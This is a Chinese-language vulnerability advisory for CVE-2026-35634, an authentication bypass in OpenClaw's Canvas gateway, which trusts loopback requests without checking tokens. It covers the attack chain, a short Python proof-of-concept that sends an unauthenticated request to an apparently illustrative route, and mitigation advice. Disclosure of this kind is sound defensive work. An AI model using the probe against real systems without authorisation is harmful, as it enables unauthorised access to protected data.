CVE-2026-35634 CVSS 5.1 中危

CVE-2026-35634 OpenClaw认证绕过漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35634

漏洞类型

认证绕过

CVSS评分

5.1 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.23之前的版本中存在严重的认证绕过漏洞。由于Canvas网关的authorizeCanvasRequest()函数错误地无条件允许本地直接请求，未对Bearer令牌或Canvas能力进行验证。攻击者可利用此漏洞发送未经认证的回环HTTP和WebSocket请求，从而绕过身份验证机制，非法获取系统访问权限。

技术细节

该漏洞主要源于OpenClaw Canvas网关在处理本地请求时的权限校验逻辑缺失。在受影响的代码逻辑中，authorizeCanvasRequest()方法被设计用于拦截未授权的请求，但其实现存在严重缺陷。系统默认将所有发往本地回环地址的请求视为可信，因此跳过了对Bearer Token的验证步骤以及Canvas能力的权限检查。
攻击者可以通过构造特定的数据包，模拟本地服务向Canvas网关发送请求。由于缺乏必要的认证屏障，攻击者能够直接与后端Canvas路由进行交互，包括执行敏感的API调用或建立WebSocket连接。这种利用方式无需用户交互，且不需要预先拥有任何凭证，极大地降低了攻击门槛。成功利用该漏洞可能导致敏感信息泄露（低机密性影响）或数据被篡改（低完整性影响），但不会直接影响系统可用性。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统运行的是OpenClaw 2026.3.23之前的版本，并确定Canvas网关的接口位置。

STEP 2

漏洞利用

攻击者向Canvas网关发送特制的HTTP或WebSocket请求，请求指向本地回环地址，且不携带Bearer Token。

STEP 3

认证绕过

OpenClaw的authorizeCanvasRequest()函数检测到本地直接请求，错误地跳过了身份验证和权限检查。

STEP 4

未授权访问

攻击者成功访问受保护的Canvas路由，获取敏感信息或执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_openclaw(target_ip, target_port):
    """
    PoC for CVE-2026-35634: OpenClaw Authentication Bypass
    This script sends an unauthenticated request to a local-direct route.
    """
    # Construct the target URL pointing to the Canvas gateway
    # Note: The vulnerability triggers when the request appears to come from a local source
    # or is routed through the local-direct mechanism.
    url = f"http://{target_ip}:{target_port}/canvas/api/sensitive_data"

    headers = {
        "User-Agent": "CVE-2026-35634-POC",
        # No Authorization header is sent, exploiting the bypass
    }

    try:
        print(f"[+] Sending unauthenticated request to {url}...")
        response = requests.get(url, headers=headers, timeout=5)

        if response.status_code == 200:
            print("[+] Success! Request bypassed authentication.")
            print(f"[+] Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")

    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Example usage
    exploit_openclaw("127.0.0.1", 8080)

影响范围

OpenClaw < 2026.3.23

防御指南

临时缓解措施

建议立即升级到修复版本。若暂时无法升级，应通过防火墙或网络策略严格限制对Canvas网关端点的访问，仅允许必要的可信服务进行通信，并监控异常的本地回环流量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表